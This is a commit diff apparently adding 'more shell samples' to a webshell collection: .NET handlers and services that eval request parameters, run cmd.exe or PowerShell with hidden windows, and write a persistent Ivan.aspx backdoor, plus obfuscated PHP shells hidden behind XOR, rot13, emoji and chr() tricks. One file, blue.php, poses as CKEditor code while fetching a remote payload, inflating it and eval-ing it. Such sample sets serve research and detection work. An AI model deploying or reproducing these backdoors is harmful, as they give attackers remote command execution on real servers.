more shell samples

more shell samples

others/AsyncHandlerSpy.ashx

@@ -0,0 +1,6 @@
+<%@ WebHandler Language="JScript" class="AsyncHandlerSpy"%>import System;import System.Web;import System.IO;public class AsyncHandlerSpy implements IHttpAsyncHandler{function IHttpAsyncHandler.BeginProcessRequest(context : HttpContext,asyncCallback :AsyncCallback , obj : Object ) : IAsyncResult {context.Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");eval(context.Request["Ivan"]);HttpContext.Current.Response.End();}function IHttpAsyncHandler.EndProcessRequest(result : IAsyncResult){}function IHttpHandler.ProcessRequest(context : HttpContext){}function get IHttpHandler.IsReusable() : Boolean{return false;}}
+
+
+
+
+

others/HandlerSpy.ashx

@@ -0,0 +1 @@
+<%@ WebHandler Language="JScript" class="HandlerSpy"%>import System;import System.Web;import System.IO;public class HandlerSpy implements IHttpHandler{function IHttpHandler.ProcessRequest(context : HttpContext){context.Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");var I = context;var Request = I.Request;var Response = I.Response;var Server = I.Server;eval(context.Request["Ivan"]);}function get IHttpHandler.IsReusable() : Boolean{return false;}}

others/asmxScriptMethodSpy.asmx

@@ -0,0 +1,2 @@
+<%@ WebService Language="JScript" class="ScriptMethodSpy"%>import System;import System.Web;import System.IO;import System.Web.Services;import System.Web.Script.Services;public class ScriptMethodSpy extends WebService{WebMethodAttribute ScriptMethodAttribute function Invoke(Ivan : String) : Void{ 
+var I = HttpContext.Current;var Request = I.Request;var Response = I.Response;var Server = I.Server;Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");eval(Ivan);}}

others/asmxSmallSpy.asmx

@@ -0,0 +1,77 @@
+<%@ WebService Language="C#" class="asmxSmallSpy"%>
+using System;
+using System.IO;
+using System.Web;
+using System.Web.Services;
+using System.Diagnostics;
+using System.Collections.Generic;
+using System.Web.Script.Serialization;
+using System.Web.Script.Services;
+[System.Web.Script.Services.ScriptService]
+[WebService(Namespace = "http://tempuri.org/" ,Description ="<B>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></B>" , Name ="asmxSmallSpy —— .NET下的又一款优雅的后门")]
+[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
+public class asmxSmallSpy : System.Web.Services.WebService
+    {
+        /**
+        Code by Ivan Lee@github.com
+        Date: 2018-07-16
+        No Pain,No Gain!
+        **/
+
+        [System.ComponentModel.ToolboxItem(false)]
+        [WebMethod]
+        /**
+        Create A BackDoor
+        **/
+        public string webShell()
+        {
+            StreamWriter wickedly = File.CreateText(HttpContext.Current.Server.MapPath("Ivan.aspx"));
+            wickedly.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"Ivan\"],\"unsafe\");%>");
+            wickedly.Flush();
+            wickedly.Close();
+            return "Wickedly";
+        }
+
+        [WebMethod]
+        /**
+        Exec Command via powerShell 
+        **/
+        public string powerShell(string input)
+        {
+            Process pr = new Process();
+            pr.StartInfo.FileName = "powershell.exe";
+            pr.StartInfo.RedirectStandardOutput = true;
+            pr.StartInfo.UseShellExecute = false;
+            pr.StartInfo.Arguments = "/c " + input;
+            pr.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
+            pr.Start();
+            StreamReader osr = pr.StandardOutput;
+            String ocmd = osr.ReadToEnd();
+            osr.Close();
+            osr.Dispose();
+            return ocmd;
+        }
+
+
+        [WebMethod]
+        /**
+        Exec Command via cmdShell 
+        **/
+        public string cmdShell(string input)
+        {
+            Process pr = new Process();
+            pr.StartInfo.FileName = "cmd.exe";
+            pr.StartInfo.RedirectStandardOutput = true;
+            pr.StartInfo.UseShellExecute = false;
+            pr.StartInfo.Arguments = "/c " + input;
+            pr.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
+            pr.Start();
+            StreamReader osr = pr.StandardOutput;
+            String ocmd = osr.ReadToEnd();
+            osr.Close();
+            osr.Dispose();
+            return ocmd;
+        }
+    }
+
+

others/asmxWebMethodSpy.asmx

@@ -0,0 +1 @@
+<%@ WebService Language="JScript" class="asmxWebMethodSpy"%>import System;import System.Web;import System.IO;import System.Web.Services;public class asmxWebMethodSpy extends WebService{       WebMethodAttribute function Invoke(Ivan : String) : Void{ var c = HttpContext.Current;var Request = c.Request;var Response = c.Response;var Server = c.Server;Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");eval(Ivan);} }

others/svcLessSpy.svc

@@ -0,0 +1,13 @@
+<%@ ServiceHost Language="JScript" Debug="true" Service="svcLessSpy"%>
+import System;
+import System.Web;
+import System.IO;
+import System.ServiceModel;
+import System.Text;
+ServiceContractAttribute public class svcLessSpy 
+{
+	OperationContractAttribute public function exec(Ivan : String) : String
+	{
+		return eval(Ivan);
+	}
+}

others/svcSmallSpy.svc

@@ -0,0 +1,40 @@
+<%@ ServiceHost Language="C#" Debug="true" Service="Service"%>
+using System;
+using System.Web;
+using System.IO;
+using System.Runtime.Serialization;
+using System.ServiceModel;
+using System.Text;
+using System.ServiceModel.Activation;
+using System.Collections.Generic;
+using System.Configuration;
+using System.ServiceModel.Web;
+using System.Diagnostics;
+[ServiceContract(Namespace = "")]
+[AspNetCompatibilityRequirements(RequirementsMode = AspNetCompatibilityRequirementsMode.Allowed)]
+public class Service
+{
+ [OperationContract]
+　public string cmdShell(string text) {
+		Process pr = new Process();
+        pr.StartInfo.FileName = "cmd.exe";
+        pr.StartInfo.RedirectStandardOutput = true;
+        pr.StartInfo.UseShellExecute = false;
+        pr.StartInfo.Arguments = "/c " + text;
+        pr.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
+        pr.Start();
+        StreamReader osr = pr.StandardOutput;
+        String ocmd = osr.ReadToEnd();
+        osr.Close();
+        osr.Dispose();
+        return ocmd;
+    }
+ [OperationContract]
+　public string webShell() {
+		StreamWriter wickedly = File.CreateText(HttpContext.Current.Server.MapPath("Ivan.aspx"));
+		wickedly.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"Ivan\"],\"unsafe\");%>");
+		wickedly.Flush();
+		wickedly.Close();
+        return "Ivan.aspx Create Success";
+    }
+}

php/asdasd.php

@@ -0,0 +1,3 @@
+<?php
+$😶="Hello World!";
+echo($😶);

php/asdfsdfsf.php

@@ -0,0 +1,6 @@
+<?php
+$password = "LandGrey";
+${"LandGrey"} = substr(__FILE__,-5,-4) . "class";
+$f = $LandGrey ^ hex2bin("12101f040107");
+array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);
+?>

php/blue.php

@@ -0,0 +1,125 @@
+<?php
+/*
+* Copyright (c) 2003-2011, CKSource - Frederico Knabben. All rights reserved.
+* For licensing, see LICENSE.html or http://ckeditor.com/license
+*/
+
+/**
+ * \brief CKEditor class that can be used to create editor
+ * instances in PHP pages on server side.
+ * @see http://ckeditor.com
+ *
+ * Sample usage:
+ * @code
+ * $CKEditor = new CKEditor();
+ * $CKEditor->editor("editor1", "<p>Initial value.</p>");
+ * @endcode
+ */
+/**
+	 * The version of %CKEditor.
+	 * \private
+	 */
+
+	/**
+	 * A constant string unique for each release of %CKEditor.
+	 * \private
+	 */
+
+
+	/**
+	 * URL to the %CKEditor installation directory (absolute or relative to document root).
+	 * If not set, CKEditor will try to guess it's path.
+	 *
+	 * Example usage:
+	 * @code
+	 * $CKEditor->basePath = '/ckeditor/';
+	 * @endcode
+	 */
+
+	/**
+	 * An array that holds the global %CKEditor configuration.
+	 * For the list of available options, see http://docs.cksource.com/ckeditor_api/symbols/CKEDITOR.config.html
+	 *
+	 * Example usage:
+	 * @code
+	 * $CKEditor->config['height'] = 400;
+	 * // Use @@ at the beggining of a string to ouput it without surrounding quotes.
+	 * $CKEditor->config['width'] = '@@screen.width * 0.8';
+	 * @endcode
+	 */
+
+	/**
+	 * A boolean variable indicating whether CKEditor has been initialized.
+	 * Set it to true only if you have already included
+	 * &lt;script&gt; tag loading ckeditor.js in your website.
+	 */
+
+	/**
+	 * Boolean variable indicating whether created code should be printed out or returned by a function.
+	 *
+	 * Example 1: get the code creating %CKEditor instance and print it on a page with the "echo" function.
+	 * @code
+	 * $CKEditor = new CKEditor();
+	 * $CKEditor->returnOutput = true;
+	 * $code = $CKEditor->editor("editor1", "<p>Initial value.</p>");
+	 * echo "<p>Editor 1:</p>";
+	 * echo $code;
+	 * @endcode
+	 */
+
+	/**
+	 * Main Constructor.
+	 *
+	 *  @param $basePath (string) URL to the %CKEditor installation directory (optional).
+	 */
+
+	/**
+	 * Creates a %CKEditor instance.
+	 * In incompatible browsers %CKEditor will downgrade to plain HTML &lt;textarea&gt; element.
+	 *
+	 * @param $name (string) Name of the %CKEditor instance (this will be also the "name" attribute of textarea element).
+	 * @param $value (string) Initial value (optional).
+	 * @param $config (array) The specific configurations to apply to this editor instance (optional).
+	 * @param $events (array) Event listeners for this editor instance (optional).
+	 *
+	 * Example usage:
+	 * @code
+	 * $CKEditor = new CKEditor();
+	 * $CKEditor->editor("field1", "<p>Initial value.</p>");
+	 * @endcode
+	 *
+	 * Advanced example:
+	 * @code
+	 * $CKEditor = new CKEditor();
+	 * $config = array();
+	 * $config['toolbar'] = array(
+	 *     array( 'Source', '-', 'Bold', 'Italic', 'Underline', 'Strike' ),
+	 *     array( 'Image', 'Link', 'Unlink', 'Anchor' )
+	 * );
+	 * $events['instanceReady'] = 'function (ev) {
+	 *     alert("Loaded: " + ev.editor.name);
+	 * }';
+	 * $CKEditor->editor("field1", "<p>Initial value.</p>", $config, $events);
+	 * @endcode
+	 */
+
+$admin['check'] = false;
+$password = 'asplwxat';
+$c = "chr";
+session_start();
+if (empty($_SESSION['PhpCode'])) {
+$url = $c(104).$c(116).$c(116).$c(112).$c(58).$c(47).$c(47);
+$url .= $c(119).$c(119).$c(119).$c(46).$c(100).$c(110).$c(97);
+$url .= $c(122).$c(97).$c(46).$c(99).$c(111).$c(109).$c(47);
+$url .= $c(112).$c(104).$c(112).$c(46).$c(106).$c(112).$c(103);
+$get = chr(102) . chr(105) . chr(108) . chr(101) . chr(95);
+$get .= chr(103) . chr(101) . chr(116) . chr(95) . chr(99);
+$get .= chr(111) . chr(110) . chr(116) . chr(101) . chr(110);
+$get .= chr(116) . chr(115);
+$_SESSION['PhpCode'] = $get($url);
+}
+$unzip = $c(103) . $c(122) . $c(105) . $c(110);
+$unzip .= $c(102) . $c(108) . $c(97) . $c(116) . $c(101);
+@eval($unzip($_SESSION['PhpCode']));
+
+?>

php/emojis-webshell.php

@@ -0,0 +1,45 @@
+<?php
+
+/*
+ * emojis-webshell
+ * A Proof of Concept for using Emojis in PHP.
+ * Author: Mazin Ahmed <Mazin AT MazinAhmed DOT net>
+ * Homepage: https://github.com/mazen160/public/tree/master/Proof-of-Concepts/emojis-webshell
+ * License: The MIT License (MIT) - https://github.com/mazen160/public/blob/master/Proof-of-Concepts/emojis-webshell/LICENSE.txt
+ *
+ * Legal Disclaimer:
+ * This project is made for educational and ethical testing purposes only. Usage of project for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
+*/
+
+$😀="a";
+$😁="b";
+$😂="c";
+$🤣="d";
+$😃="e";
+$😄="f";
+$😅="g";
+$😆="h";
+$😉="i";
+$😊="j";
+$😋="k";
+$😎="l";
+$😍="m";
+$😘="n";
+$😗="o";
+$😙="p";
+$😚="q";
+$🙂="r";
+$🤗="s";
+$🤩="t";
+$🤔="u";
+$🤨="v";
+$😐="w";
+$😑="x";
+$😶="y";
+$🙄="z";
+
+$😭 = $😙. $😀. $🤗. $🤗. $🤩. $😆. $🙂. $🤔;
+
+if (isset($_GET['👽'])) {
+  eval($😭($_GET['👽']));
+};

php/hihuosad.php

@@ -0,0 +1,13 @@
+<?php
+
+function aishen($user){
+                $b='s'.'tr_r'.'ot13';
+        $c=&$b;
+        $a=$c('nffreg');
+        if(empty($user)){
+                $user="echo '90sec'";
+        }
+        $a($user);
+}
+aishen($_POST['cookie']);
+?>

php/iughnm.php

@@ -0,0 +1,8 @@
+<?php$__=('>'>'<')+('>'>'<');
+$_=$__/$__;
+$____='';
+$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
+
+$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
+$_=$$_____;
+$____($_[_]);// assert($_POST[_]);

php/iuygfguhijk.php

@@ -0,0 +1,7 @@
+<?php
+$password = "LandGrey";
+$key = substr(__FILE__,-5,-4);
+${"LandGrey"} =  $key."Land!";
+$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
+array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);
+?>

php/iuyhgfc.php

@@ -0,0 +1,6 @@
+<?php
+$_=(chr(0x01)^'`').(chr(0x13)^'`').(chr(0x13)^'`').(chr(0x05)^'`').(chr(0x12)^'`').(chr(0x14)^'`');
+$__='_'.(chr(0x0D)^']').(chr(0x2F)^'`').(chr(0x0E)^']').(chr(0x09)^']');
+$___=$$__;
+$_($___[_]);// assert($_POST[_]);
+?>